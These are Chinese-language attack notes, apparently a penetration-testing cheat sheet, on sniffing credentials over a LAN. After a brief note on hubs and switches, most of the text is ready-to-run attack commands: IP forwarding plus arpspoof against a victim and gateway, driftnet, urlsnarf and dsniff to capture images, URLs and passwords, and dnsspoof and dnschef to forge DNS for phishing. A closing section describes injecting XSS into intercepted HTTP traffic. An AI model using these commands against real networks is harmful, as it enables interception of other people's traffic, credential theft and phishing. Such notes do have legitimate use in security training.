密码嗅探

三层地址:IP 网络到网络

二层地址:MAC 主机到主机

交换机与HUB

  • HUB属于一层设备,全端口转发(不安全,共享带宽)
  • 交换机根据学习地址转发

密码嗅探

  • 开启路由转发
    • echo 1 > /proc/sys/net/ipv4/ip_forward
  • arpspoof
    • arpspoof -t 192.168.1.101 -r 192.168.1.1
  • 网络嗅探
    • 查看流量中的图片
      • driftnet -i eth0 -a -d tempdir
    • 查看访问的url
      • urlsnarf -i eth0
    • 嗅探密码
      • dsniff -i eth0 -m(自动解码传输协议)
        • /usr/share/dsniff/dsniff.services
    • dns欺骗,可以钓鱼(修改53端口的包)
      • dnsspoof -i eth0 -f /usr/share/dsniff/dnsspoof/hosts

DNS欺骗代理

  • 搭建假的dns服务器

  • dnschef –fakeip=1.1.1.10 –fakedomains=www.google.com,www.youtube.com –interface 1.1.1.2 -q

  • 将被害者DNS指向伪造的DNS服务器

中间人攻击

  • 注入XSS
    • 即使没有xss漏洞,也可以直接向http请求中注入xss攻击代码
    • 一旦得手,影响范围巨大
    • 如果中间人发生在运营商线路上,很难引起用户注意。
  • Mitmf安装